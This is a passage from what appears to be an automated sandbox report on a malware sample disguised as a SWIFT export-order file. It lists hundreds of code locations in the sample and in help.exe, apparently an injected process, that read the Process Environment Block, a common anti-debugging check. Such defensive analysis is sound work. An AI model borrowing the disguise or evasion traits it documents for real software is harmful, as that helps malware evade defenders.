          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0148138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01495BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01454257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0140927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01408EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03035BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03022073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03031074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F64F2E mov eax, dword ptr fs:[00000030h]
